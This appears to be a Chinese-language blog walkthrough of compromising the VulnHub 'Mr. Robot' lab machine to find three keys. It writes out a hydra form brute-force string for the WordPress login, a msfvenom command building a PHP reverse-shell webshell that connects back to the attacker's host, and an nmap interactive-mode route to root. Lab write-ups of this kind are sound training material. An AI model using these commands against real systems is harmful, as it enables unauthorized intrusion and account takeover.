最新动态

常见问题

vlunhub的mrrobot靶机渗透

2021/8/2 16:12:57 阅读次数: 标签:网络安全

1.mrrobot靶机

下载地址:vulnhub.com/entry/mr-ro


2.任务目标

找到三个key


3.内网靶机识别ip

arp-scan -l查看靶机的ip地址


nmap端口扫描


先访问80端口看看


页面还挺酷炫的,访问一下robots.txt文件看看


发现有一个字典文件和3个关于key的txt文件,访问那个dic字典文件会自动下载回来


查看发现里面有很多密码


我们访问一下key文件看看,发现是一串密文,尝试解密一下看看


可以看到解密失败


访问key-1.txt发现是一个wordpress站点


尝试一下登录看看


nikto扫描出来的目录有这些,没有发现其他的漏洞


我们尝试用之前拿到的字典拿去爆破一下这个后台看看,这里我们尝试用wpscan扫描枚举过用户,但是没有枚举成功


所以我们尝试一下hydra爆破一下用户名先,我们首先要知道wordpress的后台提交数据的post参数有哪些,抓个包看看先

使用hydra的参数http-post-from模拟表单提交,构造如下参数

/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username

^USER^表示用户名,^PASS^表示密码,F代表错误的内容,表示错误的账户-p密码随便输入,这里我们只是枚举账户


可以看到已经枚举出一个Elliot的用户,我们再去爆破一下他的密码,也是用的同样的字典


可以看到两个账户,我们就拿第一个先测试一下,使用wpscan扫描爆破一下


这里我们爆破了很久,终于拿到了账号密码


登录后台之后发现可以上传文件,我们找到网站模板上传的地方进行上传


使用msf生成一个php反弹的shell文件

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4545 -o webshell.php


生成之后直接上传


上传之后在这个目录下可以看到我们上传的shell脚本


我们需要点击访问一下才能出发反弹shell


这样我们就拿到了shell,使用python切换成正常bash


我们先找下目录下面的key文件这个才是任务


直接查看是没有办法查看的


查看另外一个md5密码文件发现robot的密码hash


查看了一下文件权限发现是robot的


我们切换到robot账户再试试,先解密


直接切换


查看key文件


拿到第二个key,我们之前用find命令发现nmap可以利用提权,我们尝试提到root权限


nmap的版本存在一个交互功能可以利用版本刚好在内


输入之后发现已经是root权限了


切换到root目录下发现第三个key文件


拿到最后的key


到此渗透结束